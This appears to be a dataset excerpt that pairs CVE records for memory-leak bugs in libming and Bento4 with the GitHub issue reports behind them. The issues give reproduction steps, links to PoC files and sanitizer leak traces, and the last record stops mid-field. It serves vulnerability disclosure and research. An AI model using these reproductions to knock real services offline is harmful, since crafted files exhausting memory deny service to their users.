cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2024-24146
2024-02-29T01:44:11.657
A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/307" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/307" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/libming/libming/issues/307
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13924747/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(7.027344); $m->setDimension(0, 0); $m->setFrames(1799); /*Unknown block type 992*/ /* SWF_REMOVEOBJECT2 */ $m->remove($i2810); /* SWF_DEFINEBUTTON */ skipping 0 bytes /* SWF_PATHSAREPOSTSCRIPT */ /* SWF_NAMECHARACTER */ /* SWF_REMOVEOBJECT2 */ $m->remove($i1799); /*Unknown block type 349*/ /* SWF_DOACTION */ $m->add(new SWFAction("") ); /* SWF_JPEGTABLES */ /* SWF_DOACTION */ ``` * stderr ``` header indicates a filesize of 169083242 but filesize is 190 Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 26 but expecting 31. Stream out of sync after parse of blocktype 7 (SWF_DEFINEBUTTON). 39 but expecting 76. Stream out of sync after parse of blocktype 40 (SWF_NAMECHARACTER). 97 but expecting 90. Stream out of sync after parse of blocktype 28 (SWF_REMOVEOBJECT2). 94 but expecting 99. Stack blown!! - peek ================================================================= ==18465==ERROR: LeakSanitizer: detected memory leaks ... Direct leak of 240 byte(s) in 1 object(s) allocated from: #0 0x55f070ff26b6 in __interceptor_realloc (/home/ubuntu/lab/libming/util/swftophp+0xbb6b6) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55f0710b2975 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1541:41 Direct leak of 152 byte(s) in 1 object(s) allocated from: #0 0x55f070ff2478 in __interceptor_calloc (/home/ubuntu/lab/libming/util/swftophp+0xbb478) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55f0710b26d4 in parseSWF_DEFINEBUTTON /home/ubuntu/lab/libming/util/parser.c:1528:47 ... SUMMARY: AddressSanitizer: 42073 byte(s) leaked in 13 allocation(s). ``` You can get full log [here](https://pastebin.com/bwRHeSiW). https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L1523-L1545 On `parseSWF_DEFINEBUTTON` function, we are allocating heap memories on `Characters` and `Actions`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_DEFINEBUTTON
https://api.github.com/repos/libming/libming/issues/307/comments
1
2024-01-12T22:46:35Z
2024-02-21T22:35:18Z
https://github.com/libming/libming/issues/307
2,079,829,395
307
5,996
CVE-2024-24147
2024-02-29T01:44:11.693
A memory leak issue discovered in parseSWF_FILLSTYLEARRAY in libming v0.4.8 allows attackers to cause s denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/311" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/311" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/libming/libming/issues/311
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13925086/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(13); ming_setscale(1.0); $m->setRate(6.941406); $m->setDimension(0, 0); $m->setFrames(1542); /* SWF_PROTECT */ $m->protect("j\njQQQ\nj77777777777777777�j\njQQQ\nj7777!FWS\nj\r\r�\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r�\r\r\rQQQ\r\r\r\r\r\r�j\t�"); /* SWF_DEFINESHAPE3 */ /* Shape 27144 (TYPE=3, RECT=168,-350 64,333)*/ $character27144 = new SWFShape(); /*8 fillstyle(s)*/ /*3 linestyles(s)*/ $character27144_l0_width = 771; $character27144_l0_red = 0x12; $character27144_l0_green = 0x03; $character27144_l0_blue = 0x03; $character27144_l0_alpha = 0x03; $character27144_l1_width = 771; $character27144_l1_red = 0x03; $character27144_l1_green = 0x37; $character27144_l1_blue = 0x37; $character27144_l1_alpha = 0x37; $character27144_l2_width = 14135; $character27144_l2_red = 0x37; $character27144_l2_green = 0x37; $character27144_l2_blue = 0x37; $character27144_l2_alpha = 0x37; /* StateLineStyle: 3 */ $character27144->setLine($character27144_l2_width, $character27144_l2_red, $character27144_l2_green, $character27144_l2_blue, $character27144_l2_alpha); $character27144->setRightFill($character27144_f101058053); $character27144->movePenTo(-9211021, 15132414); /* SWF_DEFINESHAPE3 */ /* Shape 770 (TYPE=3, RECT=0,0 0,0)*/ $character770 = new SWFShape(); /*3 fillstyle(s)*/ /*3 linestyles(s)*/ $character770_l0_width = 786; $character770_l0_red = 0x03; $character770_l0_green = 0x03; $character770_l0_blue = 0x03; $character770_l0_alpha = 0x03; $character770_l1_width = 14083; $character770_l1_red = 0x37; $character770_l1_green = 0x37; $character770_l1_blue = 0x37; $character770_l1_alpha = 0x37; $character770_l2_width = 14135; $character770_l2_red = 0x37; $character770_l2_green = 0x37; $character770_l2_blue = 0x37; $character770_l2_alpha = 0x37; /* StateLineStyle: 3 */ $character770->setLine($character770_l2_width, $character770_l2_red, $character770_l2_green, $character770_l2_blue, $character770_l2_alpha); $character770->setRightFill($character770_f101058054); $character770->movePenTo(-9211021, 16654528); /* SWF_DOACTION */ Action: 5 50:SWFACTION_MBCHR Offset: 32 Action: 6 51:SWFACTION_MBCHR Offset: 33 Action: 7 52:SWFACTION_MBCHR Offset: 34 Action: 8 53:SWFACTION_MBCHR Offset: 35 Action: 9 54:SWFACTION_MBCHR Offset: 36 Action: 10 55:SWFACTION_MBCHR Offset: 37 Action: 11 56:SWFACTION_MBCHR Offset: 38 Action: 12 57:SWFACTION_MBCHR Offset: 39 Action: 13 58:SWFACTION_MBCHR Offset: 3a Action: 14 59:SWFACTION_MBCHR Offset: 3b Action: 15 60:SWFACTION_MBCHR Offset: 3c Action: 16 61:SWFACTION_MBCHR Offset: 3d Action: 17 62:SWFACTION_MBCHR Offset: 3e $m->add(new SWFAction("") ); /*Unknown block type 220*/ skipping 13 bytes /* SWF_FONTREF */ /* SWF_DOACTION */ ``` * stderr ``` header indicates a filesize of 101208077 but filesize is 197 Stream out of sync after parse of blocktype 24 (SWF_PROTECT). 187 but expecting 21. Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 74 but expecting 33. Stream out of sync after parse of blocktype 32 (SWF_DEFINESHAPE3). 78 but expecting 43. Stack blown!! - pop ================================================================= ==18459==ERROR: LeakSanitizer: detected memory leaks ... Direct leak of 36 byte(s) in 2 object(s) allocated from: #0 0x55a363c6928e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55a363d1e348 in parseSWF_LINESTYLEARRAY /home/ubuntu/lab/libming/util/parser.c:684:25 ... ``` You can get full log [here](https://pastebin.com/88FDcMfE) ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L608-L625 On `parseSWF_FILLSTYLEARRAY`, we allocate `SWF_FILLSTYLE` into heap memory and set member of `fillstyle->FillStyles`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_FILLSTYLEARRAY
https://api.github.com/repos/libming/libming/issues/311/comments
1
2024-01-13T00:00:25Z
2024-02-21T22:33:33Z
https://github.com/libming/libming/issues/311
2,079,901,582
311
5,997
CVE-2024-24149
2024-02-29T01:44:11.737
A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/libming/libming/issues/310
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc-3.zip](https://github.com/libming/libming/files/13925051/poc-3.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(255.019531); $m->setDimension(2, -1); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(62719); /* SWF_PLACEOBJECT */ /*Unknown block type 648*/ skipping 59 bytes /* SWF_DEFINESPRITE */ /* MovieClip 2570 */ $character2570 = new SWFMovieClip(); /* 2314 frames */ /* SWF_FREECHARACTER */ /* SWF_DEFINETEXT2 */ $character2056 = new SWFText(2); $character2056->moveTo(2815, 2058); $character2056->addString("X"); 0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$... 0010: 16 01 02 ... header('Content-type: application/x-shockwave-flash'); $m->output(9); ?> ``` * stderr ``` header indicates a filesize of 18446744071613768297 but filesize is 144 Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79. Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123. outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL sudden file end: read failed @125 fileSize 144, request 42 extra garbage (i.e., we messed up in main): ================================================================= ==18453==ERROR: LeakSanitizer: detected memory leaks ... Indirect leak of 80 byte(s) in 10 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89482e4d in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:264:25 Indirect leak of 80 byte(s) in 10 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89482b8f in parseSWF_GLYPHENTRY /home/ubuntu/lab/libming/util/parser.c:247:23 ``` You can get full log [here](https://pastebin.com/He2AgT1mz). ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L241-L279 On `parseSWF_GLYPHENTRY`, we dynamically allocate `gerec->GlyphIndex`, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_GLYPHENTRY
https://api.github.com/repos/libming/libming/issues/310/comments
1
2024-01-12T23:51:34Z
2024-02-21T22:35:36Z
https://github.com/libming/libming/issues/310
2,079,896,237
310
5,998
CVE-2024-24150
2024-02-29T01:44:11.777
A memory leak issue discovered in parseSWF_TEXTRECORD in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/309" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/libming/libming/issues/309
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
### Envrionment ```bash ubuntu  ~/lab/libming/util   master  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/libming/util   master  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix ``` ### Step to reproduce ```bash ./autogen.sh ./configure --disable-shared cd util make swftophp ./swftophp <PoC file> ``` ### Affected Version libming v0.4.8 (https://github.com/libming/libming/releases/tag/ming-0_4_8) ### Contents of PoC file [poc.zip](https://github.com/libming/libming/files/13925031/poc.zip) ### Expected Behavior Print error or warning messages handled within swftophp. ### Current Behavior * stdout ``` <?php $m = new SWFMovie(10); ming_setscale(1.0); $m->setRate(255.019531); $m->setDimension(2, -1); /* Note: xMin and/or yMin are not 0! */ $m->setFrames(62719); /* SWF_PLACEOBJECT */ /*Unknown block type 648*/ skipping 59 bytes /* SWF_DEFINESPRITE */ /* MovieClip 2570 */ $character2570 = new SWFMovieClip(); /* 2314 frames */ /* SWF_FREECHARACTER */ /* SWF_DEFINETEXT2 */ $character2056 = new SWFText(2); $character2056->moveTo(2815, 2058); $character2056->addString("X"); 0000: 00 00 10 00 00 0a 09 f6 0a a1 09 0a 24 0a 0a 0a ........ ....$... 0010: 16 01 02 ... header('Content-type: application/x-shockwave-flash'); $m->output(9); ?> ``` * stderr ``` header indicates a filesize of 18446744071613768297 but filesize is 144 Stream out of sync after parse of blocktype 39 (SWF_DEFINESPRITE). 105 but expecting 79. Stream out of sync after parse of blocktype 33 (SWF_DEFINETEXT2). 113 but expecting 123. outputSWF_TEXT_RECORD: can't process text record: fonts information list is NULL sudden file end: read failed @125 fileSize 144, request 42 extra garbage (i.e., we messed up in main): ================================================================= ==18453==ERROR: LeakSanitizer: detected memory leaks ... Indirect leak of 160 byte(s) in 1 object(s) allocated from: #0 0x55ba893d528e in __interceptor_malloc (/home/ubuntu/lab/libming/util/swftophp+0xbb28e) (BuildId: 8551de914f0fa059359bb0c15882dbeddbbf77b6) #1 0x55ba89483a92 in parseSWF_TEXTRECORD /home/ubuntu/lab/libming/util/parser.c:316:26 ... ``` You can get full log [here](https://pastebin.com/AaN48sBN). ### Analysis https://github.com/libming/libming/blob/04aee52363688426eab74f5d6180c149654a6473/util/parser.c#L281-L323 On `parseSWF_TEXTRECORD`, we allocating `brec->GlyphCount` into heap memory, but never been freed. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted SWF file.
Memory leaks on parseSWF_TEXTRECORD
https://api.github.com/repos/libming/libming/issues/309/comments
1
2024-01-12T23:44:59Z
2024-02-21T22:47:44Z
https://github.com/libming/libming/issues/309
2,079,890,770
309
5,999
CVE-2024-24155
2024-02-29T01:44:11.810
Bento4 v1.5.1-628 contains a Memory leak on AP4_Movie::AP4_Movie, parsing tracks and added into m_Tracks list, but mp42aac cannot correctly delete when we got an no audio track found error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/919" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/919" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-628:*:*:*:*:*:*:*", "matchCriteriaId": "27A2EAA1-1740-4A14-BFFC-BD4406E9BD87", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/axiomatic-systems/Bento4/issues/919
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
### Envrionment ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix InstalledDir: /usr/bin Found candidate GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Selected GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Candidate multilib: .;@m64 Selected multilib: .;@m64 ``` ### Step to reproduce ```bash git clone https://github.com/axiomatic-systems/Bento4.git -b v1.5.1-628 pushd Bento4 mkdir cmakebuild pushd cmakebuild cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS_RELEASE="-fsanitize=address -fno-inline" .. make mp4aac poc.mp4 out ``` ### Affected Version Bento4 v1.5.1-628 (https://github.com/axiomatic-systems/Bento4/tree/v1.5.1-628) ### Contents of PoC file [poc.zip](https://github.com/axiomatic-systems/Bento4/files/13929540/poc.zip) ### Current Behavior * stderr (Given by ASAN) ``` ERROR: no audio track found ================================================================= ==29053==ERROR: LeakSanitizer: detected memory leaks Direct leak of 64 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ec9a341 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:108:27 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 176 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ecdcff5 in AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Track.cpp:242:25 Indirect leak of 48 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca4bec in AP4_List<AP4_Track>::Add(AP4_Track*) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4List.h:160:16 Indirect leak of 48 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ed1eac1 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ubuntu/lab/Bento4_AFL/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:175:14 #2 0x55cf6ec89b79 in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:236:14 #3 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: 416 byte(s) leaked in 8 allocation(s). ``` * stderr (valgrind) ``` ==8898== 